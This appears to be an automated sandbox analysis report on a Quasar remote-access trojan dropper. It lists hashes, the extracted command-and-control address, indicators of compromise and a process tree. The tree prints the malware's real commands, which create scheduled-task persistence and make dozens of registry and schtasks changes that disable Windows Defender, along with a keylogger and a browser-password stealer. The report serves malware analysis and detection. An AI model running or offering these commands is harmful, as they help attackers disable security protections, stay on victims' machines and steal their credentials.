quasar | 09ac2a0cc0277beb2b85f5d29b4531e65fb1a25e126f89b8a5ad6d0ba04ef369

Analysis

max time kernel
60s
max time network
160s
platform
windows10_x64
resource
win10-en-20211104
submitted
06-12-2021 06:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

05603775ae6c66c7207556660da29de4.exe
Size

13.8MB
MD5

05603775ae6c66c7207556660da29de4
SHA1

96f1bed1e99e6cd51c4973a8b586f08097009c15
SHA256

09ac2a0cc0277beb2b85f5d29b4531e65fb1a25e126f89b8a5ad6d0ba04ef369
SHA512

7aa7620eda7d2a369414abb6d94671a3b8f039d4fce6dabedcc1daba1c0f91468555512dc7827e050b61168a77a4c2f8636eb8ba4a26b399c22a88709d8c5326

Score

10^/10

quasar driver persistence spyware stealer suricata trojan upx

Malware Config

Extracted

Family

quasar

Version

2.8.0.1

Botnet

Driver

134.255.220.204:4782

Mutex

6IzunZymIRucbMwSQj

Attributes

encryption_key
85wBI2y5JEbQcrqb3u8l
install_name
Driver.exe
log_directory
Driver
reconnect_delay
1000
startup_key
Realtek® High Definition Audio Driver
subdirectory
Realtek® High Definition Audio Driver

Signatures

Quasar Payload 4 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\rat v6.exe	family_quasar
C:\Users\Admin\AppData\Roaming\rat v6.exe	family_quasar
C:\Windows\SysWOW64\Realtek® High Definition Audio Driver\Driver.exe	family_quasar
C:\Windows\SysWOW64\Realtek® High Definition Audio Driver\Driver.exe	family_quasar

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

Processes:

resource	yara_rule
behavioral2/memory/1772-156-0x0000027FF6E50000-0x0000027FF718B000-memory.dmp	WebBrowserPassView

Nirsoft 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1772-156-0x0000027FF6E50000-0x0000027FF718B000-memory.dmp	Nirsoft

Blocklisted process makes network request 2 IoCs

Processes:

cmd.exe

flow pid process

24 820 cmd.exe
26 820 cmd.exe
Downloads MZ/PE file
Executes dropped EXE 9 IoCs

Processes:

keylogger py best.exerat v6.exeloader.exeRtkBtManServ.execmd.exeDriver.exeloader.exeloader.exeloader.exe

pid process

2320 keylogger py best.exe
1340 rat v6.exe
1376 loader.exe
1772 RtkBtManServ.exe
820 cmd.exe
888 Driver.exe
1232 loader.exe
5044 loader.exe
3640 loader.exe

flow	pid	process
24	820	cmd.exe
26	820	cmd.exe

pid	process
2320	keylogger py best.exe
1340	rat v6.exe
1376	loader.exe
1772	RtkBtManServ.exe
820	cmd.exe
888	Driver.exe
1232	loader.exe
5044	loader.exe
3640	loader.exe

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\loader.exe	upx
C:\Users\Admin\AppData\Roaming\loader.exe	upx
C:\Users\Admin\AppData\Roaming\loader.exe	upx
C:\Users\Admin\AppData\Roaming\loader.exe	upx

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

Driver.exeWScript.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Windows\CurrentVersion\Run\Realtek® High Definition Audio Driver = "\"C:\\Windows\\SysWOW64\\Realtek® High Definition Audio Driver\\Driver.exe\""	Driver.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce	WScript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\RealtekÂ® High Definition Audio Driver = "C:\\Windows\\SysWOW64\\RealtekÂ® High Definition Audio Driver\\Driver.exe"	WScript.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

20 ip-api.com

flow	ioc
20	ip-api.com

Drops file in System32 directory 4 IoCs

Processes:

Driver.exerat v6.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\Realtek® High Definition Audio Driver\Driver.exe	Driver.exe
File opened for modification	C:\Windows\SysWOW64\Realtek® High Definition Audio Driver	Driver.exe
File created	C:\Windows\SysWOW64\Realtek® High Definition Audio Driver\Driver.exe	rat v6.exe
File opened for modification	C:\Windows\SysWOW64\Realtek® High Definition Audio Driver\Driver.exe	rat v6.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

loader.exeloader.exe

pid process

1376 loader.exe
3640 loader.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

3968 schtasks.exe
4108 schtasks.exe

pid	process
3968	schtasks.exe
4108	schtasks.exe

Modifies registry class 8 IoCs

Processes:

rat v6.exeDriver.exeexplorer.exeRtkBtManServ.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell	rat v6.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open	rat v6.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\	rat v6.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings	Driver.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings	RtkBtManServ.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command	rat v6.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings	rat v6.exe

Modifies system certificate store 2 TTPs 6 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

loader.exeloader.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\MY\Keys	loader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\MY\Keys\2B45B1179163F067ED8504BEEA8A807724D51262	loader.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\MY\Keys\2B45B1179163F067ED8504BEEA8A807724D51262\Blob = 02000000000000006c0000001c000000000000000100000020000000000000000000000002000000650031003200360031003000300064002d0063003600610033002d0034003300340030002d0039003500320062002d0034003600650032006600320064006500650066003700650000000000000000002300000000000000140000002b45b1179163f067ed8504beea8a807724d51262	loader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\MY\Keys	loader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\MY\Keys\62BBA703D900E2753BD0BDCB3DD18812B85D002B	loader.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\MY\Keys\62BBA703D900E2753BD0BDCB3DD18812B85D002B\Blob = 02000000000000006c0000001c000000000000000100000020000000000000000000000002000000620066003100320038003700380033002d0066003800630064002d0034003900660032002d0061006500370038002d00630030006200320032006300630062006200620062006200000000000000000023000000000000001400000062bba703d900e2753bd0bdcb3dd18812b85d002b	loader.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

loader.exeConhost.exepowershell.execmd.exepowershell.exeConhost.exepowershell.exepowershell.exeDriver.exeConhost.exe

pid	process
1376	loader.exe
1376	loader.exe
1376	loader.exe
1376	loader.exe
1376	loader.exe
1376	loader.exe
1376	loader.exe
1376	loader.exe
1376	loader.exe
1376	loader.exe
1376	loader.exe
1376	loader.exe
1376	loader.exe
1376	loader.exe
3160	Conhost.exe
1688	powershell.exe
1404	cmd.exe
344	powershell.exe
344	powershell.exe
3692	Conhost.exe
3692	Conhost.exe
1644	powershell.exe
1644	powershell.exe
4184	powershell.exe
4184	powershell.exe
3160	Conhost.exe
3160	Conhost.exe
1688	powershell.exe
1688	powershell.exe
888	Driver.exe
888	Driver.exe
888	Driver.exe
888	Driver.exe
888	Driver.exe
4624	Conhost.exe
4624	Conhost.exe
888	Driver.exe
888	Driver.exe
888	Driver.exe
888	Driver.exe
888	Driver.exe
888	Driver.exe
888	Driver.exe
888	Driver.exe
888	Driver.exe
888	Driver.exe
888	Driver.exe
888	Driver.exe
888	Driver.exe
888	Driver.exe
888	Driver.exe
888	Driver.exe
888	Driver.exe
888	Driver.exe
888	Driver.exe
888	Driver.exe
888	Driver.exe
888	Driver.exe
888	Driver.exe
888	Driver.exe
888	Driver.exe
888	Driver.exe
888	Driver.exe
888	Driver.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

rat v6.exe

pid process

1340 rat v6.exe

pid	process
1340	rat v6.exe

Suspicious use of AdjustPrivilegeToken 38 IoCs

Processes:

rat v6.exeRtkBtManServ.exeDriver.exeConhost.exepowershell.execmd.exepowershell.exeConhost.exepowershell.exepowershell.exeConhost.exe

description	pid	process
Token: SeDebugPrivilege	1340	rat v6.exe
Token: SeBackupPrivilege	1340	rat v6.exe
Token: SeSecurityPrivilege	1340	rat v6.exe
Token: SeDebugPrivilege	1772	RtkBtManServ.exe
Token: SeBackupPrivilege	1340	rat v6.exe
Token: SeBackupPrivilege	1340	rat v6.exe
Token: SeSecurityPrivilege	1340	rat v6.exe
Token: SeBackupPrivilege	1340	rat v6.exe
Token: SeBackupPrivilege	1340	rat v6.exe
Token: SeSecurityPrivilege	1340	rat v6.exe
Token: SeBackupPrivilege	1340	rat v6.exe
Token: SeBackupPrivilege	1340	rat v6.exe
Token: SeSecurityPrivilege	1340	rat v6.exe
Token: SeBackupPrivilege	1340	rat v6.exe
Token: SeBackupPrivilege	1340	rat v6.exe
Token: SeSecurityPrivilege	1340	rat v6.exe
Token: SeBackupPrivilege	1340	rat v6.exe
Token: SeSecurityPrivilege	1340	rat v6.exe
Token: SeBackupPrivilege	1340	rat v6.exe
Token: SeSecurityPrivilege	1340	rat v6.exe
Token: SeSecurityPrivilege	1340	rat v6.exe
Token: SeBackupPrivilege	1340	rat v6.exe
Token: SeBackupPrivilege	1340	rat v6.exe
Token: SeSecurityPrivilege	1340	rat v6.exe
Token: SeBackupPrivilege	1340	rat v6.exe
Token: SeBackupPrivilege	1340	rat v6.exe
Token: SeSecurityPrivilege	1340	rat v6.exe
Token: SeBackupPrivilege	1340	rat v6.exe
Token: SeDebugPrivilege	888	Driver.exe
Token: SeDebugPrivilege	3160	Conhost.exe
Token: SeDebugPrivilege	1688	powershell.exe
Token: SeDebugPrivilege	1404	cmd.exe
Token: SeDebugPrivilege	344	powershell.exe
Token: SeDebugPrivilege	3692	Conhost.exe
Token: SeDebugPrivilege	1644	powershell.exe
Token: SeDebugPrivilege	4184	powershell.exe
Token: SeDebugPrivilege	888	Driver.exe
Token: SeDebugPrivilege	4624	Conhost.exe

Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

loader.exeDriver.exeloader.exe

pid process

1376 loader.exe
888 Driver.exe
3640 loader.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

05603775ae6c66c7207556660da29de4.exekeylogger py best.exerat v6.exeloader.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 2532 wrote to memory of 2320	2532	05603775ae6c66c7207556660da29de4.exe	keylogger py best.exe
PID 2532 wrote to memory of 2320	2532	05603775ae6c66c7207556660da29de4.exe	keylogger py best.exe
PID 2532 wrote to memory of 2320	2532	05603775ae6c66c7207556660da29de4.exe	keylogger py best.exe
PID 2532 wrote to memory of 1340	2532	05603775ae6c66c7207556660da29de4.exe	rat v6.exe
PID 2532 wrote to memory of 1340	2532	05603775ae6c66c7207556660da29de4.exe	rat v6.exe
PID 2532 wrote to memory of 1340	2532	05603775ae6c66c7207556660da29de4.exe	rat v6.exe
PID 2532 wrote to memory of 1376	2532	05603775ae6c66c7207556660da29de4.exe	loader.exe
PID 2532 wrote to memory of 1376	2532	05603775ae6c66c7207556660da29de4.exe	loader.exe
PID 2320 wrote to memory of 1772	2320	keylogger py best.exe	RtkBtManServ.exe
PID 2320 wrote to memory of 1772	2320	keylogger py best.exe	RtkBtManServ.exe
PID 1340 wrote to memory of 3968	1340	rat v6.exe	schtasks.exe
PID 1340 wrote to memory of 3968	1340	rat v6.exe	schtasks.exe
PID 1340 wrote to memory of 3968	1340	rat v6.exe	schtasks.exe
PID 1376 wrote to memory of 820	1376	loader.exe	cmd.exe
PID 1376 wrote to memory of 820	1376	loader.exe	cmd.exe
PID 1340 wrote to memory of 888	1340	rat v6.exe	Driver.exe
PID 1340 wrote to memory of 888	1340	rat v6.exe	Driver.exe
PID 1340 wrote to memory of 888	1340	rat v6.exe	Driver.exe
PID 1340 wrote to memory of 3288	1340	rat v6.exe	cmd.exe
PID 1340 wrote to memory of 3288	1340	rat v6.exe	cmd.exe
PID 1340 wrote to memory of 3288	1340	rat v6.exe	cmd.exe
PID 1340 wrote to memory of 3556	1340	rat v6.exe	cmd.exe
PID 1340 wrote to memory of 3556	1340	rat v6.exe	cmd.exe
PID 1340 wrote to memory of 3556	1340	rat v6.exe	cmd.exe
PID 1340 wrote to memory of 1200	1340	rat v6.exe	cmd.exe
PID 1340 wrote to memory of 1200	1340	rat v6.exe	cmd.exe
PID 1340 wrote to memory of 1200	1340	rat v6.exe	cmd.exe
PID 1340 wrote to memory of 1808	1340	rat v6.exe	cmd.exe
PID 1340 wrote to memory of 1808	1340	rat v6.exe	cmd.exe
PID 1340 wrote to memory of 1808	1340	rat v6.exe	cmd.exe
PID 1340 wrote to memory of 3596	1340	rat v6.exe	cmd.exe
PID 1340 wrote to memory of 3596	1340	rat v6.exe	cmd.exe
PID 1340 wrote to memory of 3596	1340	rat v6.exe	cmd.exe
PID 3288 wrote to memory of 3160	3288	cmd.exe	Conhost.exe
PID 3288 wrote to memory of 3160	3288	cmd.exe	Conhost.exe
PID 3288 wrote to memory of 3160	3288	cmd.exe	Conhost.exe
PID 1340 wrote to memory of 1564	1340	rat v6.exe	cmd.exe
PID 1340 wrote to memory of 1564	1340	rat v6.exe	cmd.exe
PID 1340 wrote to memory of 1564	1340	rat v6.exe	cmd.exe
PID 1340 wrote to memory of 3656	1340	rat v6.exe	cmd.exe
PID 1340 wrote to memory of 3656	1340	rat v6.exe	cmd.exe
PID 1340 wrote to memory of 3656	1340	rat v6.exe	cmd.exe
PID 1340 wrote to memory of 1260	1340	rat v6.exe	cmd.exe
PID 1340 wrote to memory of 1260	1340	rat v6.exe	cmd.exe
PID 1340 wrote to memory of 1260	1340	rat v6.exe	cmd.exe
PID 1340 wrote to memory of 3356	1340	rat v6.exe	cmd.exe
PID 1340 wrote to memory of 3356	1340	rat v6.exe	cmd.exe
PID 1340 wrote to memory of 3356	1340	rat v6.exe	cmd.exe
PID 1200 wrote to memory of 1688	1200	cmd.exe	powershell.exe
PID 1200 wrote to memory of 1688	1200	cmd.exe	powershell.exe
PID 1200 wrote to memory of 1688	1200	cmd.exe	powershell.exe
PID 1340 wrote to memory of 956	1340	rat v6.exe	cmd.exe
PID 1340 wrote to memory of 956	1340	rat v6.exe	cmd.exe
PID 1340 wrote to memory of 956	1340	rat v6.exe	cmd.exe
PID 1808 wrote to memory of 1404	1808	cmd.exe	cmd.exe
PID 1808 wrote to memory of 1404	1808	cmd.exe	cmd.exe
PID 1808 wrote to memory of 1404	1808	cmd.exe	cmd.exe
PID 1340 wrote to memory of 1572	1340	rat v6.exe	cmd.exe
PID 1340 wrote to memory of 1572	1340	rat v6.exe	cmd.exe
PID 1340 wrote to memory of 1572	1340	rat v6.exe	cmd.exe
PID 3556 wrote to memory of 344	3556	cmd.exe	powershell.exe
PID 3556 wrote to memory of 344	3556	cmd.exe	powershell.exe
PID 3556 wrote to memory of 344	3556	cmd.exe	powershell.exe
PID 1340 wrote to memory of 2892	1340	rat v6.exe	cmd.exe

System policy modification 1 TTPs 4 IoCs

evasion

Modify Registry

T1112

Processes:

rat v6.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\dontdisplaylastusername = "1"	rat v6.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\CredSSP\Parameters	rat v6.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	rat v6.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\CredSSP	rat v6.exe

C:\Users\Admin\AppData\Local\Temp\05603775ae6c66c7207556660da29de4.exe
"C:\Users\Admin\AppData\Local\Temp\05603775ae6c66c7207556660da29de4.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2532

C:\Users\Admin\AppData\Roaming\keylogger py best.exe
"C:\Users\Admin\AppData\Roaming\keylogger py best.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2320

C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe
"C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe" ZhXl39BlhP84+Y4kurA8wpehxxqA0X22IMYZ6Vpiqs4gbUNbdjDVoEzuwe9QI1beMhUDwpgbq9t8eYqac7ixuzdX2esxhonYoBWN9FbGupbkub/9oCF5YryYcksMtSymyriBd/PbXKARudWjYmyujJNq14nt3KQdYmw2VrgARL8=
3⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:1772

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"
4⤵
PID:4368

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c compile.bat
5⤵
PID:896

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"
4⤵
PID:4600

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c compile.bat
5⤵
PID:1812

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
6⤵
PID:4372

C:\Users\Admin\AppData\Roaming\rat v6.exe
"C:\Users\Admin\AppData\Roaming\rat v6.exe"
2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1340

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "Realtek® High Definition Audio Driver" /sc ONLOGON /tr "C:\Windows\SysWOW64\Realtek® High Definition Audio Driver\Driver.exe" /rl HIGHEST /f
3⤵
- Creates scheduled task(s)
PID:3968

C:\Windows\SysWOW64\Realtek® High Definition Audio Driver\Driver.exe
"C:\Windows\SysWOW64\Realtek® High Definition Audio Driver\Driver.exe"
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in System32 directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:888

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "Realtek® High Definition Audio Driver" /sc ONLOGON /tr "C:\Windows\SysWOW64\Realtek® High Definition Audio Driver\Driver.exe" /rl HIGHEST /f
4⤵
- Creates scheduled task(s)
PID:4108

C:\Windows\SysWOW64\explorer.exe
"C:\Windows\System32\explorer.exe" C:\Users\Admin\AppData\Local\Execution.vbs
4⤵
PID:4760

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Execution2.vbs"
4⤵
PID:4908

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
4⤵
PID:2200

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
4⤵
PID:4468

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
4⤵
PID:4576

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" / t REG_DWORD /d "0" /f
4⤵
PID:4740

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
4⤵
PID:4904

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
4⤵
PID:4876

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
4⤵
PID:4132

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
4⤵
PID:4820

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f
4⤵
PID:1304

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
4⤵
PID:1196

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
4⤵
PID:3092

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
4⤵
PID:764

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
4⤵
PID:4204

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
4⤵
PID:4776

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4624

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
4⤵
PID:68

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
4⤵
PID:2296

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
4⤵
PID:4788

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3692

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
4⤵
PID:1424

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
4⤵
PID:3476

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
4⤵
PID:3216

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
4⤵
PID:3976

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3160

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
4⤵
PID:4260

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
4⤵
PID:4372

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
4⤵
PID:3680

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
4⤵
PID:4620

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
4⤵
PID:4772

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f
4⤵
PID:4604

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
4⤵
PID:1828

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
4⤵
PID:1452

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
4⤵
PID:4840

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
4⤵
PID:3792

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
4⤵
PID:4384

C:\Windows\SysWOW64\WScript.exe
